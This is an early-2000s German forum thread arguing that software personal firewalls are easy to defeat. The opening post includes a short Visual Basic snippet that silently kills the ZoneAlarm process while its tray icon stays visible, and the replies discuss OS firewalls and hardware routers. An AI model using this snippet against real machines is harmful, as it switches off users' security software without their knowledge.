Soviel zur sicherheit von Privat Firewalls

Limbus

Rail God
Dabei seit
März 2001
Beiträge
138
Moin,
da eine Firewall als ganz normales Programm auf Eurem Computer läuft, ist es überhaupt kein Problem für einen Trojaner, die Firewall auszuschalten bzw. seine eigene Netzverbindung mitzubringen, die von der Firewall nicht entdeckt werden kann. Erste Viren und Trojaner, die dies auch praktizieren sind schon länger bekannt und es sollte auch schon weitere unbekannte geben:

http://www.chip.de/news_stories/news_stories_219093.html
http://www.symantec.com/avcenter/venc/data/w32.magistr.39921@mm.html
http://www.astonsoft.com/optix.htm
http://www.mischel.dhs.org/bionet312analysis.asp
http://www.y3knetwork.org/
http://www.mischel.dhs.org/buschtrommel100analysis.asp

Es gibt sicherlich noch weitere.

Wie einfach es ist, eine PF auszuschalten, zeigt dieser einfache VB Script der Zone Alarm ohne Warnmeldung beendet.


Code:
Option Explicit
        Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject
          Asv Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
          As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
          dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal
          dwProcessId As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
          hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
          (ByVal lpClassName As String, ByVal lpWindowName As String) As
          Long
Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub

Lässt sich mit beliebeiger anderer PF machen. Das schöne ist aber, dass das Tray Icon erhalten bleibt, bis man mit der Maus drüber fährt.

Gruss Limbus
 

DvP

Admiral
Dabei seit
März 2001
Beiträge
9.514
Die Firewall auf meinem Rechner läuft aber nicht als ganz normales Programm sonder ist im Browser und im OS integriert. Möchte wissen ob sie da auch so leicht zu umgehen ist.
Na was meinst du?
 

Limbus

Rail God
Ersteller dieses Themas
Dabei seit
März 2001
Beiträge
138
Moin,
wenn Du glaubst, dass ein Firewall sicher ist, wenn er im OS integriert ist, dann täuscht Du Dich aber gewaltig. Vorallem wenn es sich um eine MS OS handelt. Der IE ist auch im OS integreirt und hat Ihn deswegen noch lange nicht vor Sicherheitslücken in rauhen Mengen geschützt.

Ich weiss auch nicht, wie diese PF verhindern soll, das der Trojaner seine eigene Netzwerkschnittstelle mitbringt, die dann von der PF gar nicht überwacht wird.

Die PF unter XP wird wohl auch "nur" als "normaler" Dienst laufen und lässt sich somit auch ausknipsen.

Ich glaube allerdings nicht, das die PF im Browser integriert ist und wenn das so währe, sind dann andere Programme bzw. Browser nicht geschützt?

Das Problem einer Firewall, die nicht auf einem eigenen Rechner Läuft ist immer der User, der daran rumfummeln kann und wird. Wenn ein Programm nicht mehr läuft, wird ganz schnell alles Freigegeben.

Ich würde mich nicht auf eine PF verlassen, schon gar nicht wenn Sie von M$ kommt und man seienn Rechner auch so dicht machen kann.

Gruss Limbus
 

Sergy

Lt. Commander
Dabei seit
Mai 2001
Beiträge
1.524
Original erstellt von Limbus
Das Problem einer Firewall, die nicht auf einem eigenen Rechner Läuft ist immer der User, der daran rumfummeln kann und wird. Wenn ein Programm nicht mehr läuft, wird ganz schnell alles Freigegeben.
Sehr gute Argument. :daumen:
So sicher bin ich mit meinem Firewall auch nicht.
Deswegen hab ich ja alles auf blockieren und überwachen gestellt.
Es ist nur ca. 6 Programmen zugelassen eine Verbindung mit Internet zu haben. :rolleyes:
Dafür wird aber alles in Protokoll geschrieben. :D
Und da kann man schon prüfen welcher Depp Blödsinn macht.
Aber am besten ist kein Netzzugang zu haben. :lol:
Ist am sichersten. :rolleyes:
 
Dabei seit
Aug. 2001
Beiträge
243
Die "Firewall" in XP ist auch schon in 2000 integriert, man sperrt einfach unter den Eigenschaften von TCP/IP die zum surfen nicht benötigten ports, soviel zu der "Firewall" von XP und 2k
 

DrTest

Cadet 3rd Year
Dabei seit
Sep. 2001
Beiträge
43
Eine weitere gute lösung ist es, einen Router mit einer Hardware-Firewall zu verwenden. Die kann man nur schwierig umgehen!
 

DvP

Admiral
Dabei seit
März 2001
Beiträge
9.514
Original erstellt von Limbus
Moin,
wenn Du glaubst, dass ein Firewall sicher ist, wenn er im OS integriert ist, dann täuscht Du Dich aber gewaltig.
Hab ich nie behauptet, noch schlimmer ich hab es nichtmal zu hoffen gewagt dass sie sicher sein könnte. Ich weiß doch auch dass man bei Microsoft keine Ansprüche stellen darf und schon garkeine die Sicherheit im Bezug aufs Internet betreffen. War nur eine Frage an einen der sich anscheinen mit PS viel besser auskennt als ich.
 
Top